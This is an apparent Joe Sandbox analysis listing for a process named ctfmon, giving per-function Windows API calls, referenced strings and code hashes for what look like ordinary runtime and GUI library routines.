API ID: Prop$Window$ClassLongNameUnicodelstrcmpi
String ID: edit
API String ID: 4088303749-2167791130
Opcode ID: 1597239a4afc941c1085c894db732b3d1dba95b61e2187320e04733356a35fc6
Instruction ID: 0ff93033a9c459ba712771479cdbba0860af532220081132ab32d03344424365
Opcode Fuzzy Hash: 1597239a4afc941c1085c894db732b3d1dba95b61e2187320e04733356a35fc6
Instruction Fuzzy Hash: B721816A2015267A9360BB789C40FFF229CAE5EB44B405421FD14C1250F728DA8B8BBD

Function 0041F6F0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 52libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?), ref: 0041F704
GetProcAddress.KERNEL32(00000000,DisableThreadLibraryCalls), ref: 0041F710
EnterCriticalSection.KERNEL32(00540EE0), ref: 0041F72C
GetVersion.KERNEL32 ref: 0041F73E
GetSystemMetrics.USER32(00000007), ref: 0041F782
GetSystemMetrics.USER32(00000008), ref: 0041F78C
GetSystemMetrics.USER32(00000004), ref: 0041F796
GetSystemMetrics.USER32(0000001E), ref: 0041F79F
LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041F7AB

Strings

KERNEL32.DLL, xrefs: 0041F6FF
DisableThreadLibraryCalls, xrefs: 0041F70A

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: MetricsSystem$CriticalSection$AddressEnterHandleLeaveModuleProcVersion
String ID: DisableThreadLibraryCalls$KERNEL32.DLL
API String ID: 1414939872-3863293605
Opcode ID: e3aa8b7d68d2a924411618861676c163313d584acc5e2ea4edb0b14968c04ba3
Instruction ID: 1b76817333bc6af864855b7e5f9623894a9456d6f1598ca0c8fea5307d477cc5
Opcode Fuzzy Hash: e3aa8b7d68d2a924411618861676c163313d584acc5e2ea4edb0b14968c04ba3
Instruction Fuzzy Hash: 31112078950315AAD720AB60AC496CE3F60FF05348F50543AEA00972F0D779848EDF8E

Function 00412330 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,0042F1F8,00000001,00000000,00000000,7622E860,0053FD88,?,?,?,00416871,?,?,?,00000000), ref: 00412372
LCMapStringA.KERNEL32(00000000,00000100,0042F1F4,00000001,00000000,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 0041238E
LCMapStringA.KERNEL32(?,?,?,qhA,?,?,7622E860,0053FD88,?,?,?,00416871,?,?,?,00000000), ref: 004123D7
MultiByteToWideChar.KERNEL32(?,?,?,qhA,00000000,00000000,7622E860,0053FD88,?,?,?,00416871,?,?,?,00000000), ref: 0041240F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412467
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 0041247D
LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00416871,?,?,?,00000000,00000001), ref: 004124B0
LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412518

Strings

qhA, xrefs: 004123FA, 0041245C, 004123CB, 004123AB

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID: qhA
API String ID: 352835431-109923292
Opcode ID: 9b5ad6b26a613f15ee88acef6ac07d595746195d4a2bcaefb84c6f805b6936c2
Instruction ID: 022544586a59cc1c19d10a42de7e4e70b0ca33dfdf838dda5653db0c0489c209
Opcode Fuzzy Hash: 9b5ad6b26a613f15ee88acef6ac07d595746195d4a2bcaefb84c6f805b6936c2
Instruction Fuzzy Hash: 28517E31A00209FFCF218F54DE45EEF7BB5FB49750F50412AF914A1260D37989A1DB69

Function 0041F070 Relevance: 16.7, APIs: 11, Instructions: 199COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,?), ref: 0041F0B4
CallWindowProcA.USER32(00000000), ref: 0041F0D9

Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 5a95a9b41c8fc2d37364fe1a2b04355123226dd158324cccf79beebb18d5b243
Instruction ID: f1e4040e56493d437ac46db905cae456868ac3245465abe7b0ffa80cda6678ad
Opcode Fuzzy Hash: 5a95a9b41c8fc2d37364fe1a2b04355123226dd158324cccf79beebb18d5b243
Instruction Fuzzy Hash: ED518076A04200BFD220EB55DCC4DBFB7B8EBC9715F54442EF94583251E239AC8A87A6

Function 0041F400 Relevance: 16.6, APIs: 11, Instructions: 140windowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0041F40E
GetClientRect.USER32(?,?), ref: 0041F429
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0041F45B
SelectObject.GDI32(?,00000000), ref: 0041F469
SetBkMode.GDI32(?,00000002), ref: 0041F47A
GetParent.USER32(?), ref: 0041F488
SendMessageA.USER32(00000000), ref: 0041F48F
SelectObject.GDI32(?,00000000), ref: 0041F499
SelectObject.GDI32(?,00000000), ref: 0041F4BB
SelectObject.GDI32(?,00000000), ref: 0041F4CB
OffsetRect.USER32(?,000000FF,000000FF), ref: 0041F522

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ObjectSelect$MessageRectSend$ClientLongModeOffsetParentWindow
String ID:
API String ID: 3606012576-0
Opcode ID: f7fa03efbb0a66176dc49cc41372e7cbe411cfa1cfd8160426a7a43753d65c69
Instruction ID: e1acb393bdb105ea5047fdd93fdf0929f10e42051cf65a82c9b5611acde4adff
Opcode Fuzzy Hash: f7fa03efbb0a66176dc49cc41372e7cbe411cfa1cfd8160426a7a43753d65c69
Instruction Fuzzy Hash: 72413F722443017BD210AB58AC86FBF736CEBC5B14F84053DF70196192D759E90B87BA

Function 0041CB71 Relevance: 16.6, APIs: 11, Instructions: 107COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000FC), ref: 0041CB8D
RemovePropA.USER32(?,?), ref: 0041CBC3
SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041CBC9
RemovePropA.USER32(?,?), ref: 0041CBF7
SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041CBFD
GetWindow.USER32(?,00000005), ref: 0041CC52
GetWindow.USER32(00000000,00000002), ref: 0041CC63

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Long$PropRemove
String ID:
API String ID: 3256693057-0
Opcode ID: 36df50be8ca3e0aa6a92018f1b9fdc3f7e6f4b5b25b034851e1aae027e5d082a
Instruction ID: 793464c1ab96f3f28d4b13fd69ea8cc3b37c752f7a31a6ea227274fee3499300
Opcode Fuzzy Hash: 36df50be8ca3e0aa6a92018f1b9fdc3f7e6f4b5b25b034851e1aae027e5d082a
Instruction Fuzzy Hash: 7821067A2440257AC3216778BC80DFF228CDB9A368B110136FA04D2290FB29ECC747BD

Function 00405772 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 231memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00405777
MapDialogRect.USER32(?,?), ref: 004057FD
SysAllocStringLen.OLEAUT32(?,00000000), ref: 0040581E
CLSIDFromString.OLE32(0000FFFC,?), ref: 00405909
CLSIDFromProgID.OLE32(0000FFFC,?), ref: 00405911
SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,?,?,0000FC84,00000000), ref: 004059AD
SysFreeString.OLEAUT32(?), ref: 00405A00

Strings

`DvP?Dv, xrefs: 00405A00

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prologProgRectWindow
String ID: `DvP?Dv
API String ID: 493809305-2995021381
Opcode ID: 76058ddd35c64321db0c5c4c9e8bc567c32fe2d22cfa7dfe102f258be5c60066
Instruction ID: ddfec87cd7aa1e3dc79061aa66cd0129ae2a5a4b187d7cfc1545594e6d37e31f
Opcode Fuzzy Hash: 76058ddd35c64321db0c5c4c9e8bc567c32fe2d22cfa7dfe102f258be5c60066
Instruction Fuzzy Hash: F3A1197190061ADFCB10DFA9D984AEEBBB4FF08304F14813EE815A7290D7749A55CFA9

Function 00415C71 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,0042F1F8,00000001,@,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415CB0
GetStringTypeA.KERNEL32(00000000,00000001,0042F1F4,00000001,@,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415CCA
GetStringTypeW.KERNEL32(00000100,?,00407093,00000008,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415CF1
WideCharToMultiByte.KERNEL32(?,00000220,?,00407093,00000000,00000000,00000000,00000000,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415D24
WideCharToMultiByte.KERNEL32(?,00000220,?,00407093,00000000,00000000,00000000,00000000,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415D8D
GetStringTypeA.KERNEL32(@,00000100,?,?,?,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415DF8

Strings

@, xrefs: 00415CA2, 00415CBE, 00415CA5, 00415CC1
@, xrefs: 00415DCD, 00415DF7

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID: @$@
API String ID: 3852931651-2930932199
Opcode ID: 637b9a2027f8d11f9ba14c48296acc9abc446613b4d653ebd54a83bfefdd23d3
Instruction ID: 1c15a09582e329dc3b7eb93bde5ac744ef8d040035c95133badfe14c744ef744
Opcode Fuzzy Hash: 637b9a2027f8d11f9ba14c48296acc9abc446613b4d653ebd54a83bfefdd23d3
Instruction Fuzzy Hash: 64519231D00709EBCF219F95DC46AEF7FB4FB89750F20452AF410A6290D3749991DBA8

Function 0040AE0A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AE0F
VariantClear.OLEAUT32(?), ref: 0040AEB4
SysFreeString.OLEAUT32(00000000), ref: 0040AF35
SysFreeString.OLEAUT32(00000000), ref: 0040AF44
SysFreeString.OLEAUT32(00000000), ref: 0040AF53
VariantClear.OLEAUT32(?), ref: 0040AF5D
VariantClear.OLEAUT32(?), ref: 0040AF6E

Part of subcall function 0040A633: __EH_prolog.LIBCMT ref: 0040A638
Part of subcall function 0040A633: VariantClear.OLEAUT32(00000007), ref: 0040AB8C
Part of subcall function 0040A633: VariantClear.OLEAUT32(?), ref: 0040AD99

Part of subcall function 0040CE35: VariantCopy.OLEAUT32(?,?), ref: 0040CE3D

Strings

`DvP?Dv, xrefs: 0040AF35, 0040AF44, 0040AF53

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Variant$Clear$FreeString$H_prolog$Copy
String ID: `DvP?Dv
API String ID: 3345578691-2995021381
Opcode ID: 527a1c3fc3581c05ebe35c4305d89dfccdc4838b1892ceeab9f248ec18f835ab
Instruction ID: 7a1db6359f3125c85e1e53df7fe4f0938f48fa671959c3eaa9cad5873132af52
Opcode Fuzzy Hash: 527a1c3fc3581c05ebe35c4305d89dfccdc4838b1892ceeab9f248ec18f835ab
Instruction Fuzzy Hash: 815128B1A00309EFDB14DFA4C884BEEBBB8FF08704F10452AE115A7291D774A955CB95

Function 0040902F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00409046
SetMapMode.GDI32(00000000,00000003), ref: 00409051
LPtoDP.GDI32(00000000,?,00000002), ref: 0040907A
__ftol.LIBCMT ref: 004090C3
__ftol.LIBCMT ref: 004090CE
DPtoLP.GDI32(00000000,?,00000002), ref: 004090DD
ReleaseDC.USER32(?,00000000), ref: 00409121

Strings

W, xrefs: 00409110

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: __ftol$ModeRelease
String ID: W
API String ID: 1379597261-655174618
Opcode ID: fa7acd1234dd63ba8f1e8afded327bb42ab26611bd1c67e31014e76cbf7f569f
Instruction ID: 8ca894d6ef4fa197229fbb959d41c86698faa0bbb9e13a2d725a5857b8f61538
Opcode Fuzzy Hash: fa7acd1234dd63ba8f1e8afded327bb42ab26611bd1c67e31014e76cbf7f569f
Instruction Fuzzy Hash: 55415D74A01209EFDB14CF98D589AEEBBB0FF44300F1584AAE855AB392C7389E50CF54

Function 0042538C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 004253A8
GetStockObject.GDI32(0000000D), ref: 004253B0
GetObjectW.GDI32(00000000,0000005C,?), ref: 004253BD
GetDC.USER32(00000000), ref: 004253CC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004253E3
MulDiv.KERNEL32(?,00000048,00000000), ref: 004253EF
ReleaseDC.USER32(00000000,00000000), ref: 004253FA

Strings

System, xrefs: 004253A1, 00425410

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: b5aa894935c3560286c83436582695622890635bab9a7bdb21018ccdce49e049
Instruction ID: f46f37b3d3d4612b8e83e0057ece6bda57a43c624d054bcf47829690f41a9a48
Opcode Fuzzy Hash: b5aa894935c3560286c83436582695622890635bab9a7bdb21018ccdce49e049
Instruction Fuzzy Hash: 3B117731B00728ABEB109BA59C49FAF7B68AB04795F904026FA05E71D1D7749C42C7A4

Function 004154A8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,00410685,?,Microsoft Visual C++ Runtime Library,00012010,?,0042F07C,?,0042F0CC,?,?,?,Runtime Error!Program: ), ref: 004154BA
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004154D2
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004154E3
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004154F0

Strings

GetActiveWindow, xrefs: 004154DD
GetLastActivePopup, xrefs: 004154E5
user32.dll, xrefs: 004154B5
MessageBoxA, xrefs: 004154CC

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 5ab5992dddaa3f7fa0f417d9efb794b7685826fe295bf1f12a020d1beb63436b
Instruction ID: 4643cc2abfda65c973c0f230a36f017a01bddbd01039f16f24786c98e207d1fc
Opcode Fuzzy Hash: 5ab5992dddaa3f7fa0f417d9efb794b7685826fe295bf1f12a020d1beb63436b
Instruction Fuzzy Hash: 7D017571B00611EF8710AFF5ADC4D9B3BAB9AA8690354083BA504D2721DB78C88DAB34

Function 00423E07 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,00424101,?,00020000), ref: 00423E10
LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 00423E19
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00423E2D
#17.COMCTL32 ref: 00423E48
#17.COMCTL32 ref: 00423E64
FreeLibrary.KERNEL32(00000000), ref: 00423E70

Strings

COMCTL32.DLL, xrefs: 00423E09, 00423E0F, 00423E16
InitCommonControlsEx, xrefs: 00423E25

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: fbc2046041922bd786504a1cdf1c0074c3bd5e3fbe41aaae23bd871ef4b93d28
Instruction ID: 75276020c994f243a46c4147610413596e97131f96f2929e1f4ad0196d98a365
Opcode Fuzzy Hash: fbc2046041922bd786504a1cdf1c0074c3bd5e3fbe41aaae23bd871ef4b93d28
Instruction Fuzzy Hash: D0F08632B403229786216FE8AC8891F72A8AB947527960476F450E3210CF28ED078B7E

Function 00417B40 Relevance: 13.7, APIs: 9, Instructions: 221COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,0042F1F8,00000001,0042F1F8,00000001,00000000,-00000004,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A), ref: 00417B7E
CompareStringA.KERNEL32(00000000,00000000,0042F1F4,00000001,0042F1F4,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417B9B
CompareStringA.KERNEL32(00000000,00000000,00000000,00000000,0040F46A,?,00000000,-00000004,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A), ref: 00417BF9
GetCPInfo.KERNEL32(?,00000000,00000000,-00000004,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417C4A
MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417CC9
MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,?,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D2A
MultiByteToWideChar.KERNEL32(?,00000009,0040F46A,?,00000000,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D3D
MultiByteToWideChar.KERNEL32(?,00000001,0040F46A,?,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D89
CompareStringW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417DA1

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ByteCharCompareMultiStringWide$Info
String ID:
API String ID: 1651298574-0
Opcode ID: 626c00746097870350dcb73b9ce94af668f21a0bcfd9788210486e2b273a240b
Instruction ID: 7b3f78671b9cc246bcbdba2b09b373ac3ce48b51b29b8ccc2d9feaddae2fe836
Opcode Fuzzy Hash: 626c00746097870350dcb73b9ce94af668f21a0bcfd9788210486e2b273a240b
Instruction Fuzzy Hash: FD71AF7590824AAFDF219F94EC819EF7BB5FF45344F10012BF950A2260D3398D91DBA9

Function 0040FDDE Relevance: 13.6, APIs: 9, Instructions: 147COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FDFC
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FE10
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FE31
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040FE68
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FE88
MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,?,0040D0BE), ref: 0040FEA6
FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,0040D0BE), ref: 0040FEDB
MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,0040D0BE,?,00000000,?,?,?,0040D0BE), ref: 0040FF0B
